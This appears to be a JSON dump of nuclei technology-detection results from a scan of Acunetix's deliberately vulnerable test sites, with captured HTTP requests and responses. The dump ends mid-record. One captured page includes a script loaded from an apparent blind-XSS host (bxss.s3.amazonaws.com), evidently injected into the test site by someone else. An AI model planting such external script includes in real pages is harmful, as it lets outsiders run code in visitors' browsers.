href="javascript:__doPostBack('RightPanel1$Calendar','9074')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9075')" style="color:Black" title="November 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9076')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9077')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9078')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9079')" style="color:Black" title="November 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9080')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9081')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9082')" style="color:Black" title="November 12">12</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9083')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9084')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9085')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9086')" style="color:Black" title="November 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9087')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9088')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9089')" style="color:Black" title="November 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9090')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9091')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9092')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9093')" style="color:Black" title="November 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9094')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9095')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9096')" style="color:Black" title="November 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9097')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9098')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9099')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9100')" style="color:Black" title="November 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9101')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9102')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9103')" style="color:Black" title="December 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9104')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9105')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9106')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9107')" style="color:Black" title="December 07">7</a></td></tr>\r\n</table><BR>\r\n<a href="rssFeed.aspx">Get RSS feed</a>\r\n</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD colSpan="2">\r\n\t\t\t\t\t</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t</TABLE>\r\n\t\t</form>\r\n\t</body>\r\n\t<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">\r\n\t\t<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>\r\n\t</div>\r\n</HTML>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 7, + 8, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 70, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.33' 'http://testhtml5.vulnweb.com/ajax/archive'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/ajax/archive", + "discovered_date": "2024-11-13T02:34:40.723Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /ajax/archive HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.33\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 2\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n[]", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 71, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Edg/118.0.2088.61' 'http://testhtml5.vulnweb.com/like'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/like", + "discovered_date": "2024-11-13T02:34:40.804Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /like HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Edg/118.0.2088.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Thank you very much for your feedback! <!-- invalid -->\n<link src='http://localhost/link'>\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 72, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 whid/orf3 macaddress/64c901fd8856' 'http://testhtml5.vulnweb.com'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:40.920Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 whid/orf3 macaddress/64c901fd8856\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 73, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "angularjs", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0' 'http://testhtml5.vulnweb.com/comment'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/comment", + "discovered_date": "2024-11-13T02:34:41.016Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /comment HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Sorry, but commenting is currently disabled! <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 74, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134' 'http://testhtml5.vulnweb.com/contact'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/contact", + "discovered_date": "2024-11-13T02:34:41.091Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /contact HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 75, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0' 'http://testhtml5.vulnweb.com/login'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/login", + "discovered_date": "2024-11-13T02:34:41.152Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 76, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/samples", + "discovered_date": "2024-11-13T02:34:41.211Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /samples HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36\r\nConnection: 